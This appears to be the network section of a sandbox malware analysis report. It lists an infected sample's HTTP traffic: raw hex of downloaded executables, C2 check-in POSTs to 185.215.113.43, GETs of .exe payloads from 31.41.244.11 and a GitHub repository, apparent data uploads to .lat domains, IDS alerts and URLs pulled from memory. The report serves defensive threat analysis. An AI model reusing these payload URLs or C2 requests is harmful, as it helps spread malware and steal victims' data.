                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 19 Dec 2024 05:09:49 GMTContent-Type: application/octet-streamContent-Length: 4438776Last-Modified: Tue, 10 Dec 2024 00:01:52 GMTConnection: keep-aliveETag: "675784f0-43baf8"Accept-Ranges: bytesData Raw: 4d 5a 60 00 01 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 52 65 71 75 69 72 65 20 57 69 6e 64 6f 77 73 0d 0a 24 50 45 00 00 4c 01 04 00 ce 3f c3 4f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 08 00 00 90 01 00 00 96 00 00 00 00 00 00 5f 94 01 00 00 10 00 00 00 a0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 02 00 00 02 00 00 e7 a4 44 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 c9 01 00 c8 00 00 00 00 30 02 00 10 4f 00 00 00 00 00 00 00 00 00 00 10 7b 43 00 e8 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 01 00 6c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0e 8e 01 00 00 10 00 00 00 90 01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 da 3b 00 00 00 a0 01 00 00 3c 00 00 00 92 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 ec 4d 00 00 00 e0 01 00 00 0a 00 00 00 ce 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 10 4f 00 00 00 30 02 00 00 50 00 00 00 d8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 55 8b ec a1 60 e9 41 00 81 ec 04 09 00 00 53 33 db 3b c3 56 57 74 1f 66 39 1d 62 e9 41 00 74 07 ff d0 a3 60 e9 41 00 50 e8 50 14 00 00 50 e8 ef 84 00 00 59 eb 6e 6a 27 e8 40 14 00 00 8b 75 08 ff 76 0c 8b 3d c0 a2 41 00 ff 36 50 8d 85 fc f6 ff ff 50 ff d7 83 c4 14 39 5e 10 89 5d fc 76 38 8d 5e 14 ff 33 8d 85 fc fe ff ff 68 90 a4 41 00 50 ff d7 83 c4 0c 8d 85 fc fe ff ff 50 8d 85 fc f6 ff ff 50 ff 15 78 a1 41 00 ff 45 fc 8b 45 fc 83 c3 04 3b 46 10 72 cb 8d 85 fc f6 ff ff 50 e8 7e 84 00 00 59 e8 d4 36 00 00 6a 0a ff 15 74 a1 41 00 cc ff 74 24 04 e8 44 ff ff ff cc 56 8b f1 e8 25 73 00 00 c7 06 a0 a4 41 00 c7 46 38 d2 07 00 00 8b c6 5e c3 6a 01 ff 71 04 ff 15 bc a2 41 00 c3 33 c0 39 05 60 ea 41 00 74 07 b8 04 40 00 80 eb 1e 39 44 24 08 74 16 ff 74 24 08 50 68 02 80 00 00 ff 35 58 ea 41 00 ff 15 b8 a2 41 00 33 c0 c2 08 00 8b 44 24 04 83 60 1c 00 83 7c 24 08 00 75 07 c7 40 1c 01 00 00 00 33 c0 c2 08 00 a0 70 e9 41 00 f6 d8 1b c0 83 e0 0b 83 c0 08 c3 ff 74 24 10 8b 44 24 08 ff 74 24 10 c7 05 60 e9 41 00 2f 11 40 00 ff 74 24 10 8b 08 50 ff 51 0c 83 25 60 e9 41 00 00 c3 33 c0 c2 0c 00 8b 54 24 08 8b 4c 24 04 0f b7 02 66 89 01 41 41 42 42 66 85 c0 75 f1 c3 8b 4c 24 04 33 c0 66 39
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 19 Dec 2024 05:10:01 GMTContent-Type: application/octet-streamContent-Length: 765568Last-Modified: Tue, 17 Dec 2024 09:46:16 GMTConnection: keep-aliveETag: "67614868-bae80"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 09 00 a3 1e 60 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 00 00 aa 01 00 00 c0 00 00 00 00 00 00 52 59 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 0b 00 00 08 00 00 00 00 00 00 03 00 40 83 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 37 02 00 3c 00 00 00 00 a0 02 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 80 0b 00 80 2e 00 00 00 b0 02 00 40 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 fe 01 00 18 00 00 00 e8 cd 01 00 c0 00 00 00 00 00 00 00 00 00 00 00 28 39 02 00 54 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 9c a8 01 00 00 10 00 00 00 aa 01 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 24 8b 00 00 00 c0 01 00 00 8c 00 00 00 b2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 22 00 00 00 50 02 00 00 16 00 00 00 3e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 53 00 00 00 00 53 00 00 00 00 80 02 00 00 02 00 00 00 54 02 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 74 6c 73 00 00 00 00 09 00 00 00 00 90 02 00 00 02 00 00 00 56 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e8 00 00 00 00 a0 02 00 00 02 00 00 00 58 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 40 19 00 00 00 b0 02 00 00 1a 00 00 00 5a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 62 73 73 00 00 00 00 00 86 04 00 00 d0 02 00 00 86 04 00 00 74 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 00 86 04 00 00 60 07 00 00 86 04 00 00 fa 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 19 Dec 2024 05:10:08 GMTContent-Type: application/octet-streamContent-Length: 3286016Last-Modified: Wed, 18 Dec 2024 13:43:08 GMTConnection: keep-aliveETag: "6762d16c-322400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 88 cf 56 f4 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 50 00 00 c8 2f 00 00 5a 02 00 00 00 00 00 ce e6 2f 00 00 20 00 00 00 00 30 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 32 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 80 e6 2f 00 4b 00 00 00 00 00 30 00 40 57 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 32 00 0c 00 00 00 33 e6 2f 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d4 c6 2f 00 00 20 00 00 00 c8 2f 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 40 57 02 00 00 00 30 00 00 58 02 00 00 ca 2f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 32 00 00 02 00 00 00 22 32 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 e6 2f 00 00 00 00 00 48 00 00 00 02 00 05 00 00 c2 01 00 40 1c 04 00 03 00 00 00 43 0d 00 06 40 de 05 00 7a 05 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 2b 05 28 42 0f 39 39 28 02 00 00 06 2a 00 00 3a 2b 05 28 f1 af 5e 41 00 28 21 0d 00 06 2a 00 12 00 00 00 2a 00 00 00 1a 28 2a 0c 00 06 2a 00 12 00 00 00 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 1a 28 2a 0c 00 06 2a 00 13 30 03 00 92 00 00 00 01 00 00 11 28 2a 0c 00 06 38 79 00 00 00 fe 0c 00 00 45 03 00 00 00 63 00 00 00 4f 00 00 00 2f 00 00 00 38 5e 00 00 00 73 17 00 00 0a 80 04 00 00 04 20 01 00 00 00 17 3a d5 ff ff ff 26 38 cb ff ff ff 73 18 00 00 0a 80 03 00 00 04 38 d6 ff ff ff 73 19 00 00 0a 80 06 00 00 04 20 00 00 00 00 17 39 ab ff ff ff 26 20 00 00 00 00 38 a0 ff ff ff 73 1a 00 00 0a 80 05 00 00 04 20 02 00 00 00 38 8c ff ff ff 2a 73 1b 00 00 0a 80 02 00 00 04 38 ad ff ff ff 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00
                              Source: global trafficHTTP traffic detected: GET /Urijas/moperats/raw/refs/heads/main/jthjjdweajtujhjad.exe HTTP/1.1Host: github.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /Urijas/moperats/refs/heads/main/jthjjdweajtujhjad.exe HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 39 37 36 42 35 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EB52976B55F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                              Source: global trafficHTTP traffic detected: GET /files/1293295511/zudFSfy.exe HTTP/1.1Host: 31.41.244.11
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 37 33 31 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1017319001&unit=246122658369
                              Source: global trafficHTTP traffic detected: GET /files/1293295511/kz8ZdyP.exe HTTP/1.1Host: 31.41.244.11
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 37 33 32 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1017321001&unit=246122658369
                              Source: global trafficHTTP traffic detected: GET /files/lolz/random.exe HTTP/1.1Host: 31.41.244.11
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 37 33 35 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1017351001&unit=246122658369
                              Source: global trafficHTTP traffic detected: GET /files/unique3/random.exe HTTP/1.1Host: 31.41.244.11
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 37 33 35 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1017352001&unit=246122658369
                              Source: global trafficHTTP traffic detected: GET /files/burpin1/random.exe HTTP/1.1Host: 31.41.244.11
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 37 33 35 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1017353001&unit=246122658369
                              Source: global trafficHTTP traffic detected: GET /files/dodo/random.exe HTTP/1.1Host: 31.41.244.11
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 37 33 35 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1017354001&unit=246122658369
                              Source: global trafficHTTP traffic detected: GET /files/x3team/random.exe HTTP/1.1Host: 31.41.244.11
                              Source: Joe Sandbox ViewIP Address: 185.215.113.43 185.215.113.43
                              Source: Joe Sandbox ViewIP Address: 104.21.64.80 104.21.64.80
                              Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49763 -> 31.41.244.11:80
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49787 -> 31.41.244.11:80
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49823 -> 31.41.244.11:80
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49838 -> 31.41.244.11:80
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49860 -> 31.41.244.11:80
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49889 -> 104.21.66.85:443
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49892 -> 31.41.244.11:80
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49896 -> 104.21.66.85:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49904 -> 104.21.66.85:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49915 -> 104.21.66.85:443
                              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49910 -> 31.41.244.11:80
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49922 -> 104.21.66.85:443
                              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49918 -> 104.21.64.80:443
                              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: aspecteirs.lat
                              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 50Host: aspecteirs.lat
                              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=0H1DHIFZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18106Host: aspecteirs.lat
                              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=HXWSW5Y24IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8739Host: aspecteirs.lat
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007EE0C0 recv,recv,recv,recv,0_2_007EE0C0
                              Source: global trafficHTTP traffic detected: GET /Urijas/moperats/raw/refs/heads/main/jthjjdweajtujhjad.exe HTTP/1.1Host: github.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /Urijas/moperats/refs/heads/main/jthjjdweajtujhjad.exe HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /files/1293295511/zudFSfy.exe HTTP/1.1Host: 31.41.244.11
                              Source: global trafficHTTP traffic detected: GET /files/1293295511/kz8ZdyP.exe HTTP/1.1Host: 31.41.244.11
                              Source: global trafficHTTP traffic detected: GET /files/lolz/random.exe HTTP/1.1Host: 31.41.244.11
                              Source: global trafficHTTP traffic detected: GET /files/unique3/random.exe HTTP/1.1Host: 31.41.244.11
                              Source: global trafficHTTP traffic detected: GET /files/burpin1/random.exe HTTP/1.1Host: 31.41.244.11
                              Source: global trafficHTTP traffic detected: GET /files/dodo/random.exe HTTP/1.1Host: 31.41.244.11
                              Source: global trafficHTTP traffic detected: GET /files/x3team/random.exe HTTP/1.1Host: 31.41.244.11
                              Source: global trafficDNS traffic detected: DNS query: github.com
                              Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
                              Source: global trafficDNS traffic detected: DNS query: aspecteirs.lat
                              Source: global trafficDNS traffic detected: DNS query: sweepyribs.lat
                              Source: global trafficDNS traffic detected: DNS query: grannyejh.lat
                              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: aspecteirs.lat
                              Source: skotes.exe, 00000006.00000002.2970891358.000000000076C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
                              Source: skotes.exe, 00000006.00000002.2970891358.000000000079A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/1293295511/kz8ZdyP.exe
                              Source: skotes.exe, 00000006.00000002.2970891358.000000000079A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/1293295511/kz8ZdyP.exei
                              Source: skotes.exe, 00000006.00000002.2970891358.000000000076C000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2970891358.0000000000748000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/1293295511/zudFSfy.exe
                              Source: skotes.exe, 00000006.00000002.2970891358.0000000000748000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/1293295511/zudFSfy.exeshqos.dll
                              Source: skotes.exe, 00000006.00000002.2970891358.000000000079A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/burpin1/random.exe
                              Source: skotes.exe, 00000006.00000002.2970891358.000000000079A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/burpin1/random.exeW
                              Source: skotes.exe, 00000006.00000002.2970891358.000000000079A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/dodo/random.exe
                              Source: skotes.exe, 00000006.00000002.2970891358.000000000079A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/lolz/random.exe
                              Source: skotes.exe, 00000006.00000002.2970891358.000000000079A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/unique3/random.exe
                              Source: skotes.exe, 00000006.00000002.2970891358.000000000079A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/unique3/random.exeo
                              Source: skotes.exe, 00000006.00000002.2970891358.000000000079A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/x3team/random.exe
                              Source: skotes.exe, 00000006.00000002.2970891358.000000000079A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/x3team/random.exe%
                              Source: skotes.exe, 00000006.00000002.2970891358.000000000079A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/x3team/random.exe76-s
                              Source: skotes.exe, 00000006.00000002.2970891358.000000000079A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/x3team/random.exe9
                              Source: skotes.exe, 00000006.00000002.2970891358.000000000079A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/x3team/random.exeI
                              Source: skotes.exe, 00000006.00000002.2970891358.000000000079A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/x3team/random.exed
                              Source: skotes.exe, 00000006.00000002.2970891358.000000000079A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/x3team/random.exeded
